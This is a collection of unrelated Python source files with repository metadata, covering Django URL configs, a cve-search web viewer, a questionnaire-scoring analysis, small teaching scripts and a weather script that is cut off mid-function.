cb1b09b13545f6e89fee158e5b5e37ee7d392d73 | 59366342805d7b7682a8c45fd5c11b910e791c21 | /L8包/package/pack1/py1.py | b0fd52ca063138c053548e40274a039e81ea139e | [] | no_license | wantwantwant/tutorial | dad006b5c9172b57c53f19d8229716f1dec5ccd1 | 8d400711ac48212e6992cfd187ee4bfb3642f637 | refs/heads/master | 2022-12-29T05:41:12.485718 | 2019-01-07T08:28:33 | 2019-01-07T08:28:33 | 171,679,026 | 2 | 0 | null | 2022-12-08T01:21:22 | 2019-02-20T13:33:42 | Python | UTF-8 | Python | false | false | 214 | py | def foo():
# 假设代表一些逻辑处理
print('foo')
def boo():
print('boo')
# 单脚本的时候,调用方法
foo()
boo()
print(__name__)
#
# if __name__ =='__main__':
# foo()
# boo()
| [
"778042395@qq.com"
] | 778042395@qq.com |
35da58bdb8be02fba0f38d7f0bb56498199a2c1a | b090cb9bc30ac595675d8aa253fde95aef2ce5ea | /trunk/test/NightlyRun/test304.py | 73f9108132ad2bddc032b4278bf438f74d72234c | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | eyhl/issm | 5ae1500715c258d7988e2ef344c5c1fd15be55f7 | 1013e74c28ed663ebb8c9d398d9be0964d002667 | refs/heads/master | 2022-01-05T14:31:23.235538 | 2019-01-15T13:13:08 | 2019-01-15T13:13:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | #Test Name: SquareSheetConstrainedStressSSA3d
from model import *
from socket import gethostname
from triangle import *
from setmask import *
from parameterize import *
from setflowequation import *
from solve import *
md=triangle(model(),'../Exp/Square.exp',180000.)
md=setmask(md,'','')
md=parameterize(md,'../Par/SquareSheetConstrained.py')
md.extrude(3,2.)
md=setflowequation(md,'SSA','all')
md.cluster=generic('name',gethostname(),'np',3)
md=solve(md,'Stressbalance')
#Fields and tolerances to track changes
field_names =['Vx','Vy','Vz','Vel','Pressure']
field_tolerances=[1e-13,1e-13,1e-13,1e-13,1e-13]
field_values=[\
md.results.StressbalanceSolution.Vx,\
md.results.StressbalanceSolution.Vy,\
md.results.StressbalanceSolution.Vz,\
md.results.StressbalanceSolution.Vel,\
md.results.StressbalanceSolution.Pressure,\
]
| [
"cummings.evan@gmail.com"
] | cummings.evan@gmail.com |
5be75593b7002ffbd31b4897bca03ea2ca701912 | cb938bb6201fb7ec3611623b54682a2252a0fc32 | /stud_comms/urls.py | 179f878fc5543e3e915ec1f32679e4628bab1528 | [] | no_license | JonoCX/2015-placement | 35e6ca11dac3841fcf785b4a787a5aadf403e5af | 385d70911cbc70cd9e030665caae44aa4504a685 | refs/heads/master | 2021-01-10T16:39:53.242741 | 2015-11-09T15:01:27 | 2015-11-09T15:01:27 | 45,845,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
from core.views import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'stud_comms.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', views.login, name='login'),
url(r'^admin/', include(admin.site.urls)),
url(r'^comms-system/', include('core.urls')),
url(r'^accounts/login/', views.login),
)
# Precaution; if debug is left on
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_URL) | [
"j.carlton@newcastle.ac.uk"
] | j.carlton@newcastle.ac.uk |
e095364f26d4002c10f2091881651d28c6288ec2 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/config_files/read_config_1.py | 7778e50073f61ca9d0f99726798d819291ac18a6 | [] | no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
#
################################################################################
from configparser import ConfigParser, ExtendedInterpolation
import re
import myutils
parser = ConfigParser(interpolation=ExtendedInterpolation(), strict=True)
parser.SECTCRE = re.compile(r"\[ *(?P<header>[^]]+?) *\]")
with open('config1.cfg', encoding='utf-8') as f:
parser.read_file(f)
myutils.showconfig1(parser)
| [
"askobeldin@gmail.com"
] | askobeldin@gmail.com |
b8137ddbd4d31ee1e675044996c2784fc45b202a | 28c1c3afaf5e70c0530b864ead16fa8762ef1ca4 | /ch05_Array/list_size.py | 78660ba7e14c0f9ebf85b4bc2b7a1d1726f1190f | [] | no_license | luoshao23/Data_Structure_and_Algorithm_in_Python | 8059381c21580e3e4f1276089b9fe4f96de385f8 | 051754963ca2eb818b981ba72583314a043e5df4 | refs/heads/master | 2020-04-29T06:29:02.148886 | 2019-05-15T02:46:48 | 2019-05-15T02:46:48 | 175,917,337 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | import sys
data = []
n = 27
for k in range(n):
a = len(data)
b = sys.getsizeof(data)
print('Length: {0:3d}; Size in bytes: {1:4d}'.format(a, b))
data.append(None)
| [
"luoshao23@gmail.com"
] | luoshao23@gmail.com |
71d91862e4376636867c0d4e4cf9c0e031276eab | 192494cfac925b9134723185ce9e844b3b13abca | /texteditorlib/autotyping.py | 957de6010fb912e703b50d45e4598123b6a8ca73 | [] | no_license | mdsajjadansari/Text-Editor | 78145511bf7111c8f0e0074656eb466c88c750a6 | 342de71e494afe764d059926ddeaed1604dd8a70 | refs/heads/master | 2022-06-17T14:29:45.861129 | 2020-05-05T00:44:43 | 2020-05-05T00:44:43 | 259,432,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py |
if __name__=='__main__':
from Graphics import Tkinter
else:
from .Graphics import Tkinter
if __name__=='__main__':
from Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
else:
from .Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
import time
import threading
class AutoWrite:
def __init__(self, pad):
self.text = pad
path = tkFileDialog.askopenfilename()
if path:
self.s = open(path, 'r').read()
self.insert_words()
else:
self.s = None
def insert_words(self):
print("[+] Auto Typing Executed")
for i in self.s:
self.text.insert("end", str(i))
time.sleep(0.1)
self.text.master.update()
self.text.master.update_idletasks()
return
if __name__ == '__main__':
root = Tkinter.Tk()
t= Tkinter.Text(root)
t.pack()
k=AutoWrite(t)
s=threading.Thread(target=k.insert_words)
k.insert_words()
s.start()
root.mainloop()
| [
"iamsajjadansari@gmail.com"
] | iamsajjadansari@gmail.com |
ca46b5a2afb0afc86c6767c17a30760e6a097ebe | af46ef78a8e680733efa0056e0388db529a523a3 | /list/is_instance.py | 4a52a23d6b36f6cba7246bfc4960f42ebeba6397 | [] | no_license | mjhea0/python-basic-examples | 90f3aa1cb1a1399a7fe7b1b7e07cced517433490 | aaf4a5458f3e016703b6677033ea17b9cc901596 | refs/heads/master | 2021-01-15T18:31:28.455291 | 2013-09-21T03:59:23 | 2013-09-21T03:59:23 | 13,141,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #coding:utf-8
numList = [2000, 2003, 2005, 2006]
stringList = ["Essential", "Python", "Code"]
mixedList = [1, 2, "three", 4]
subList = ["A", "B", ["C", 2006]]
listList = [numList, stringList, mixedList, subList]
for x in listList:
for y in x:
if isinstance(y, int):
print y + 1
if isinstance(y, basestring):
print "String:" + y
| [
"wang.bo@okcash.cn"
] | wang.bo@okcash.cn |
6b19f346e79e3bb234cd98628ac0189f74c1dc9c | 6c3bdcad87e2ddbc6d8e61419b62d91b898071ab | /sdk/python/config/listConfigRules.py | 51a7eddfa4e733f46e2266d99f1048c431a99d72 | [] | no_license | JaydeepUniverse/aws | c6b2a7f93668d7300223be46a418d436233ff9ad | 528043a78dc0a07bc8b0bb1193c7f440f8a5bd1a | refs/heads/master | 2023-02-22T00:41:32.376590 | 2021-01-16T10:17:22 | 2021-01-16T10:17:22 | 292,547,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | ## Do AWS CLI configuration - aws configure
import boto3
client = boto3.client('config')
rulesList = client.describe_config_rules()
for i in rulesList['ConfigRules']:
print(i['ConfigRuleName'])
| [
"noreply@github.com"
] | JaydeepUniverse.noreply@github.com |
3c7761a66a130162d48b33cc7bb6d62086a049f8 | 1b9dcc5051719fce3fdf6d64ef6b39adc10d5bb3 | /Tools/cve-search-master/web/minimal.py | 8ed4b0e2f7a93f31d4aeed408738049797a0376e | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] | permissive | abuvanth/watchdog | 20e0358a6892206fcc794478d2d24c95c838fa4e | 0a0fae253bf4321cdfb83052f56555a5ca77f7b9 | refs/heads/master | 2020-10-01T20:23:53.950551 | 2019-12-12T13:57:56 | 2019-12-12T13:57:56 | 227,618,188 | 2 | 0 | Apache-2.0 | 2019-12-12T13:51:25 | 2019-12-12T13:51:24 | null | UTF-8 | Python | false | false | 8,912 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Minimal web interface to cve-search to display the last entries
# and view a specific CVE.
#
# Software is free software released under the "Modified BSD license"
#
# Copyright (c) 2013-2016 Alexandre Dulaunoy - a@foo.be
# Copyright (c) 2014-2016 Pieter-Jan Moreels - pieterjan.moreels@gmail.com
# imports
import os
import re
import sys
import urllib
_runPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(_runPath, ".."))
from flask import render_template, request
import lib.DatabaseLayer as db
import lib.Toolkit as tk
from lib.Config import Configuration
from web.api import API, APIError
class Minimal(API):
#############
# Variables #
#############
defaultFilters={'timeSelect': 'all',
'startDate': '', 'endDate': '', 'timeTypeSelect': 'Modified',
'cvssSelect': 'all', 'cvss': '', 'rejectedSelect': 'hide'}
args = {'pageLength': Configuration.getPageLength(),
'listLogin': Configuration.listLoginRequired(),
'minimal': True}
def __init__(self):
self.minimal = True
super().__init__()
routes = [{'r': '/', 'm': ['GET'], 'f': self.index},
{'r': '/', 'm': ['POST'], 'f': self.index_post},
{'r': '/r/<int:r>', 'm': ['GET'], 'f': self.index_filter_get},
{'r': '/r/<int:r>', 'm': ['POST'], 'f': self.index_filter_post},
{'r': '/cve/<cveid>', 'm': ['GET'], 'f': self.cve},
{'r': '/cwe', 'm': ['GET'], 'f': self.cwe},
{'r': '/cwe/<cweid>', 'm': ['GET'], 'f': self.relatedCWE},
{'r': '/capec/<capecid>', 'm': ['GET'], 'f': self.capec},
{'r': '/browse', 'm': ['GET'], 'f': self.browse},
{'r': '/browse/', 'm': ['GET'], 'f': self.browse},
{'r': '/browse/<vendor>', 'm': ['GET'], 'f': self.browse},
{'r': '/search/<vendor>/<path:product>', 'm': ['GET'], 'f': self.search},
{'r': '/search', 'm': ['POST'], 'f': self.freetext_search},
{'r': '/link/<key>/<value>', 'm': ['GET'], 'f': self.link}]
filters = [{'n': 'htmlEncode', 'f': self.htmlEncode},
{'n': 'htmlDecode', 'f': self.htmlDecode},
{'n': 'sortIntLikeStr', 'f': self.sortIntLikeStr}]
context_processors = [self.JSON2HTMLTable]
error_handlers = [{'e': 404, 'f': self.page_not_found}]
for route in routes: self.addRoute(route)
for _filter in filters: self.addFilter(_filter)
for context in context_processors: self.addContextProcessors(context)
for handler in error_handlers: self.app.register_error_handler(handler['e'], handler['f'])
#############
# Functions #
#############
def addFilter(self, _filter):
self.app.add_template_filter(_filter['f'], _filter['n'])
def addContextProcessors(self, context_processor):
self.app.context_processor(context_processor)
def getFilterSettingsFromPost(self, r):
filters = dict(request.form)
filters = {x: filters[x][0] for x in filters.keys()}
errors = False
# retrieving data
try:
cve = self.filter_logic(filters, r)
except Exception as e:
cve = db.getCVEs(limit=self.args['pageLength'], skip=r)
errors = True
return {'filters': filters, 'cve': cve, 'errors': errors}
return(filters,cve,errors)
##########
# ROUTES #
##########
# /
def index(self):
cve = self.filter_logic(self.defaultFilters, 0)
return render_template('index.html', cve=cve, r=0, **self.args)
# /
def index_post(self):
args = dict(self.getFilterSettingsFromPost(0), **self.args)
return render_template('index.html', r=0, **args)
# /r/<r>
def index_filter_get(self, r):
if not r or r < 0: r = 0
cve = self.filter_logic(self.defaultFilters, r)
return render_template('index.html', cve=cve, r=r, **self.args)
# /r/<r>
def index_filter_post(self, r):
if not r or r < 0: r = 0
args = dict(self.getFilterSettingsFromPost(r), **self.args)
return render_template('index.html', r=r, **args)
# /cve/<cveid>
def cve(self, cveid):
cve = self.api_cve(cveid)
if not cve:
return render_template('error.html',status={'except':'cve-not-found','info':{'cve':cveid}},minimal=self.minimal)
return render_template('cve.html', cve=cve, minimal=self.minimal)
# /cwe
def cwe(self):
cwes=[x for x in self.api_cwe() if x["weaknessabs"].lower()=="class"]
return render_template('cwe.html', cwes=cwes, capec=None, minimal=self.minimal)
# /cwe/<cweid>
def relatedCWE(self, cweid):
cwes={x["id"]: x["name"] for x in self.api_cwe()}
return render_template('cwe.html', cwes=cwes, cwe=cweid, capec=db.getCAPECFor(cweid), minimal=self.minimal)
# /capec/<capecid>
def capec(self, capecid):
cwes={x["id"]: x["name"] for x in self.api_cwe()}
return render_template('capec.html', cwes=cwes, capec=db.getCAPEC(capecid), minimal=self.minimal)
# /browse
# /browse/
# /browse/<vendor>
def browse(self, vendor=None):
try:
data = self.api_browse(vendor)
if 'product' in data and 'vendor' in data:
return render_template('browse.html', product=data["product"], vendor=data["vendor"], minimal=self.minimal)
else:
return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info': 'No CPE'})
except APIError as e:
return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info':e.message})
# /search/<vendor>/<product>
def search(self, vendor=None, product=None):
search = vendor + ":" + product
cve = db.cvesForCPE(search)
return render_template('search.html', vendor=vendor, product=product, cve=cve, minimal=self.minimal)
# /search
def freetext_search(self):
search = request.form.get('search')
result = db.getSearchResults(search)
cve=result['data']
errors=result['errors'] if 'errors' in result else []
return render_template('search.html', cve=cve, errors=errors, minimal=self.minimal)
# /link/<key>/<value>
def link(self, key=None,value=None):
key=self.htmlDecode(key)
value=self.htmlDecode(value)
regex = re.compile(re.escape(value), re.I)
cve=db.via4Linked(key, regex)
cvssList=[float(x['cvss']) for x in cve if x.get('cvss')]
if cvssList:
stats={'maxCVSS': max(cvssList), 'minCVSS': min(cvssList),'count':len(cve)}
else:
stats={'maxCVSS': 0, 'minCVSS': 0, 'count':len(cve)}
return render_template('linked.html', via4map=key.split(".")[0], field='.'.join(key.split(".")[1:]),
value=value, cve=cve, stats=stats, minimal=self.minimal)
###########
# Filters #
###########
def htmlEncode(self, string):
return urllib.parse.quote_plus(string).lower()
def htmlDecode(self, string):
return urllib.parse.unquote_plus(string)
def sortIntLikeStr(self, datalist):
return sorted(datalist, key=lambda k: int(k))
def JSON2HTMLTable(self):
# Doublequote, because we have to |safe the content for the tags
def doublequote(data):
return urllib.parse.quote_plus(urllib.parse.quote_plus(data))
def JSON2HTMLTableFilter(data, stack = None):
_return = ""
if type(stack) == str: stack = [stack]
if type(data) == list:
if len(data) == 1:
_return += JSON2HTMLTableFilter(data[0], stack)
else:
_return += '<ul class="via4">'
for item in data:
_return += ('<li>%s</li>'%JSON2HTMLTableFilter(item, stack))
_return += '</ul>'
elif type(data) == dict:
_return += '<table class="invisiTable">'
for key, val in sorted(data.items()):
_return += '<tr><td><b>%s</b></td><td>%s</td></tr>'%(key, JSON2HTMLTableFilter(val, stack+[key]))
_return += '</table>'
elif type(data) == str:
if stack:
_return += "<a href='/link/"+doublequote('.'.join(stack))+"/"+doublequote(data)+"'>" #link opening
_return += "<span class='glyphicon glyphicon-link' aria-hidden='true'></span> </a>"
_return += "<a target='_blank' href='%s'>%s</a>"%(data, data) if tk.isURL(data) else data
_return += ""
return _return
return dict(JSON2HTMLTable=JSON2HTMLTableFilter)
##################
# Error Messages #
##################
def page_not_found(self, e):
return render_template('404.html', minimal=self.minimal), 404
if __name__ == '__main__':
server = Minimal()
server.start()
| [
"mohan.kk@flipkart.com"
] | mohan.kk@flipkart.com |
48b2e11482852404b0d42df21d5e7252714aaf19 | 53bff3de85c6e04b448623a4f71b062b6a102974 | /PhysicalCuriosity/PhysicalCuriosityStudy.py | 7c0705c53a8edc453845c489f3ae6af609f8bd3b | [] | no_license | rinatrosenbergkima/pandas | 366f9e35f753f0dd5e3016d1e79d22028171e656 | 1ed61618105f776af072380da8b521f47f4236ae | refs/heads/master | 2021-09-27T20:28:16.485741 | 2018-11-11T16:32:12 | 2018-11-11T16:32:12 | 109,816,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,246 | py | #tutorial:
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/Intro_ml_models.ipynb
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/predicting_income_from_census_income_data.ipynb
# > this is how to install pandas
# > sudo easy_install pip
# > pip install wheel
# > pip install pandas
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
df_AQ = pd.read_csv('data/AQ.csv', sep=',')
df_BFI = pd.read_csv('data/BFI.csv', sep=',')
df_demographics = pd.read_csv('data/demographics.csv', sep=',')
df_tablet = pd.read_csv('data/tablet.csv', sep=',')
df_summary = pd.DataFrame ()
def process_BFI():
# Reverse BFI:
df_BFI["BFI_6r"] = 6 - df_BFI["BFI_6"]
df_BFI["BFI_21r"] = 6 - df_BFI["BFI_21"]
df_BFI["BFI_9r"] = 6 - df_BFI["BFI_9"]
df_BFI["BFI_24r"] = 6 - df_BFI["BFI_4"]
df_BFI["BFI_34r"] = 6 - df_BFI["BFI_34"]
df_BFI["BFI_2r"] = 6 - df_BFI["BFI_2"]
df_BFI["BFI_12r"] = 6 - df_BFI["BFI_12"]
df_BFI["BFI_27r"] = 6 - df_BFI["BFI_27"]
df_BFI["BFI_37r"] = 6 - df_BFI["BFI_37"]
df_BFI["BFI_8r"] = 6 - df_BFI["BFI_8"]
df_BFI["BFI_18r"] = 6 - df_BFI["BFI_18"]
df_BFI["BFI_23r"] = 6 - df_BFI["BFI_23"]
df_BFI["BFI_43r"] = 6 - df_BFI["BFI_43"]
df_BFI["BFI_35r"] = 6 - df_BFI["BFI_35"]
df_BFI["BFI_41r"] = 6 - df_BFI["BFI_41"]
# calculate the big 5 factors:
df_BFI["BFI_extraversion"] = df_BFI[["BFI_1","BFI_6r","BFI_11","BFI_16","BFI_21r","BFI_26","BFI_31","BFI_36"]].mean(axis=1)
df_BFI["BFI_neuroticism"] = df_BFI[["BFI_4","BFI_9r","BFI_14","BFI_24r","BFI_29","BFI_34r","BFI_39"]].mean(axis=1)
df_BFI["BFI_agreeableness"] = df_BFI[["BFI_2r","BFI_7","BFI_12r","BFI_17","BFI_22","BFI_27r","BFI_32","BFI_37r","BFI_42"]].mean(axis=1)
df_BFI["BFI_concientiousness"] = df_BFI[["BFI_3","BFI_8r","BFI_13","BFI_18r","BFI_23r","BFI_28","BFI_33","BFI_38","BFI_43r"]].mean(axis=1)
df_BFI["BFI_openness"] = df_BFI[["BFI_5","BFI_10","BFI_15","BFI_20","BFI_25","BFI_30","BFI_35r","BFI_40","BFI_41r","BFI_44"]].mean(axis=1)
def process_AQ():
# reverse AQ (Autism Spectrum Quotient Questions)
## http://aspergerstest.net/interpreting-aq-test-results/
df_AQ["AQ_3"] = 6 - df_AQ["AQ_3"]
df_AQ["AQ_8"] = 6 - df_AQ["AQ_8"]
df_AQ["AQ_10"] = 6 - df_AQ["AQ_10"]
df_AQ["AQ_11"] = 6 - df_AQ["AQ_11"]
df_AQ["AQ_14"] = 6 - df_AQ["AQ_14"]
df_AQ["AQ_15"] = 6 - df_AQ["AQ_15"]
df_AQ["AQ_17"] = 6 - df_AQ["AQ_17"]
df_AQ["AQ_24"] = 6 - df_AQ["AQ_24"]
df_AQ["AQ_25"] = 6 - df_AQ["AQ_25"]
df_AQ["AQ_27"] = 6 - df_AQ["AQ_27"]
df_AQ["AQ_28"] = 6 - df_AQ["AQ_28"]
df_AQ["AQ_29"] = 6 - df_AQ["AQ_29"]
df_AQ["AQ_30"] = 6 - df_AQ["AQ_30"]
df_AQ["AQ_31"] = 6 - df_AQ["AQ_31"]
df_AQ["AQ_32"] = 6 - df_AQ["AQ_32"]
df_AQ["AQ_34"] = 6 - df_AQ["AQ_34"]
df_AQ["AQ_36"] = 6 - df_AQ["AQ_36"]
df_AQ["AQ_37"] = 6 - df_AQ["AQ_37"]
df_AQ["AQ_38"] = 6 - df_AQ["AQ_38"]
df_AQ["AQ_40"] = 6 - df_AQ["AQ_40"]
df_AQ["AQ_44"] = 6 - df_AQ["AQ_44"]
df_AQ["AQ_47"] = 6 - df_AQ["AQ_47"]
df_AQ["AQ_48"] = 6 - df_AQ["AQ_48"]
df_AQ["AQ_49"] = 6 - df_AQ["AQ_49"]
df_AQ["AQ_50"] = 6 - df_AQ["AQ_50"]
# Definitely agree or Slightly agree responses to questions 1, 2, 4, 5, 6, 7, 9, 12, 13, 16, 18, 19, 20, 21, 22, 23, 26, 33, 35, 39, 41, 42, 43, 45, 46 score 1 point.
# Definitely disagree or Slightly disagree responses to questions 3, 8, 10, 11, 14, 15, 17, 24, 25, 27, 28, 29, 30, 31, 32, 34, 36, 37, 38, 40, 44, 47, 48, 49, 50 score 1 point.
for column in df_AQ.iloc[:,1:51]:
df_AQ[column] = (df_AQ[column]>3)*1 # Give one point to questions who score less than 3
df_AQ["AQ_total"] = df_AQ.iloc[:,1:51].sum(axis=1)
def create_df_summary():
# create data frame with the important data
df_summary["id"] = df_AQ["id"]
df_summary["demographics_age"] = df_demographics["age"]
df_summary["demographics_gender"] = df_demographics["gender"]
df_summary["demographics_grades"] = df_demographics["grades"]
df_summary["demographics_psychometrics"] = df_demographics["psychometrics"]
df_summary["demographics_control_robot"] = df_demographics["control_robot"]
df_summary["demographics_q1"] = df_demographics["q1"]
df_summary["demographics_q2"] = df_demographics["q2"]
df_summary["demographics_q3"] = df_demographics["q3"]
df_summary["tablet_transition_entropy"] = df_tablet["transition_entropy"]
df_summary["tablet_multi_discipline_entropy"] = df_tablet["Multi_discipline_entropy"]
df_summary["tablet_multi_discipline_entropy"] = df_tablet["Multi_discipline_entropy"]
df_summary["tablet_psycholetrics"] = df_tablet["PSY"]
df_summary["tablet_normalized_total_listenning_time"] = df_tablet["normalized_total_listenning_time"]
df_summary["BFI_extraversion"] = df_BFI["BFI_extraversion"]
df_summary["BFI_neuroticism"] = df_BFI["BFI_neuroticism"]
df_summary["BFI_agreeableness"] = df_BFI["BFI_agreeableness"]
df_summary["BFI_concientiousness"] = df_BFI["BFI_concientiousness"]
df_summary["BFI_openness"] = df_BFI["BFI_openness"]
df_summary["AQ_total"] = df_AQ["AQ_total"]
#print(df_summary)
def correlation_matrix(df,title):
from matplotlib import pyplot as plt
from matplotlib import cm as cm
print("correlation_matrix")
fig = plt.figure()
ax1 = fig.add_subplot(111)
cmap = cm.get_cmap('jet', 10)
cax = ax1.imshow(df.corr(), interpolation="nearest", cmap=cmap)
ax1.grid(True)
plt.title(title)
labels=list(df) #the dataframe headers
print(labels)
ax1.set_xticklabels(labels,fontsize=4, rotation='vertical')
ax1.set_yticklabels(labels,fontsize=4)
# Add colorbar, make sure to specify tick locations to match desired ticklabels
fig.colorbar(cax, ticks=[0,.05,.10,.15,.20,.25,.30,.35,.40,.45,.50,.55,.60,.65,.70,.75,.8,.85,.90,.95,1])
plt.show()
def correlation_summary(df):
corr = df.corr()
print(corr)
plt.matshow(corr)
headers = list(df_summary)
x_pos = np.arange(len(headers))
plt.xticks(x_pos, headers, rotation='vertical', fontsize=4)
y_pos = np.arange(len(headers))
plt.yticks(y_pos, headers, fontsize=4)
plt.show()
def plot_correlations(x,y):
#plt.plot(df_summary["demographics_psychometrics"], df_summary["BFI_extraversion"], 'ro')
#plt.axis([400, 800, 0, 5])
#plt.show()
fig, ax = plt.subplots()
idx = np.isfinite(x) & np.isfinite(y)
fit = np.polyfit(x[idx], y[idx], deg=1)
ax.plot(x[idx], fit[0] * x[idx] + fit[1], color='red')
ax.scatter(x, y)
fig.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
process_BFI()
process_AQ()
create_df_summary()
#correlation_summary(df_summary)
#correlation_matrix(df_summary,"correlations")
plot_correlations(df_summary["demographics_psychometrics"],df_summary["BFI_extraversion"])
#plt.plot(df_summary["demographics_grades"],df_summary["BFI_extraversion"], 'ro')
#plt.plot(df_summary["BFI_concientiousness"],df_summary["tablet_normalized_total_listenning_time"], 'ro')
| [
"rinat.rosenberg.kima@gmail.com"
] | rinat.rosenberg.kima@gmail.com |
b29c5e65d26f5c8c0c9f722d200de823dcf5af31 | a478489da108ec850795ac24f798a0ac75bb4709 | /Standard_deviation-master/graphs/class1.py | d9180f882b2dbfe906f689b678c6b6f76b08ae4f | [
"MIT"
] | permissive | LiamBrower/Class-105 | 9ff0f54f98b3bc1a2e0b659cc67995a0b7b1c604 | 11b2aeaf8ad5836bd2da113261bbfb7abd52d441 | refs/heads/main | 2023-08-16T07:13:37.831836 | 2021-10-12T23:53:30 | 2021-10-12T23:53:30 | 416,531,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | import csv
with open(r'C:\Users\docto\Dropbox\WhiteHatJr\Class-105\Standard_deviation-master\graphs\class1.csv', newline='') as f:
reader = csv.reader(f)
file_data = list(reader)
#To remove headers from CSV
file_data.pop(0)
total_marks = 0
total_entries = len(file_data)
for marks in file_data:
total_marks += float(marks[1])
mean = total_marks / total_entries
print("Mean (Average) is -> "+str(mean))
import pandas as pd
import plotly.express as px
df = pd.read_csv("class1.csv")
fig = px.scatter(df, x="Student Number",
y="Marks"
)
fig.update_layout(shapes=[
dict(
type= 'line',
y0= mean, y1= mean,
x0= 0, x1= total_entries
)
])
fig.update_yaxes(rangemode="tozero")
fig.show()
| [
"noreply@github.com"
] | LiamBrower.noreply@github.com |
32d8b228910b00555072d555646b4a470a56bb2b | 0ce37bdeab869e0b20dab275f0f7e1b3bf7dcb60 | /project/project/urls.py | bd5366ef2d10037ae18a26c664cd0fb65e54585f | [
"MIT"
] | permissive | amritharun/squirrel-tracker | c9fcd15a59f73b4d80d072c190b74f7bd3d2239e | e3d0223ede58b442c53a0fa931ed59d4443ed4a1 | refs/heads/main | 2022-12-30T19:40:56.716080 | 2020-10-22T19:58:40 | 2020-10-22T19:58:40 | 302,137,821 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('tracker.urls')),
]
| [
"aa4053@columbia.edu"
] | aa4053@columbia.edu |
83416776a453799aedb29e38b0934f13e88a005a | c49e1cf78851aec6b3df5b4774d16020e919ed65 | /server/server/urls.py | d8c5d72f20c89ab8c18390b24afdb2f68626b3fe | [] | no_license | weeksling/product-tracking-portal | 5c3e41ae773f49440ff74adc4d3352133fe9485a | 4f10c573a18eeac19d6aed3bf3008d180ccb0a07 | refs/heads/master | 2021-01-06T20:35:14.141517 | 2017-08-13T23:30:39 | 2017-08-13T23:30:39 | 99,381,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls', namespace='api', app_name='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
] | [
"weeksling@gmail.com"
] | weeksling@gmail.com |
ad703714edd63c2fc81280105c049bd81f3fb31a | 7d5af69c8ff72a003d171072e0f025400f309fc8 | /get_weather_pyowm.py | 38365653e54613d36283e50afb8d54fcdea697d8 | [] | no_license | elormcent/centlorm | a47f033e39fc9e093607e3705613fcd07bb8852d | ec7a60faa2dc2c196247ccd44d2fb6dbd7c2bdad | refs/heads/master | 2020-06-18T07:43:52.555439 | 2019-07-15T16:14:21 | 2019-07-15T16:14:21 | 196,219,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | import pyowm
from gpiozero import LED
from time import sleep
def Weather_Forecast():
city = input("Enter Name of City with space :- ")
country = input("Enter Name of Country :- ")
led = LED(17)#yellow
led1 = LED(18)#red
led2 = LED(27)#green
apikey = '51c6723dd2f51626dd33896729e79676'
owm = pyowm.OWM(apikey)
observation = owm.weather_at_place('city, country')
w = observation.get_weather()
winds = w.get_wind()
humidities = w.get_humidity()
tempreture = w.get_temperature()
presh = w.get_pressure()
clud = w.get_clouds()
ran = w.get_rain()
snoww = w.get_snow()
print(" The weather information ")
if winds['speed'] < 15:
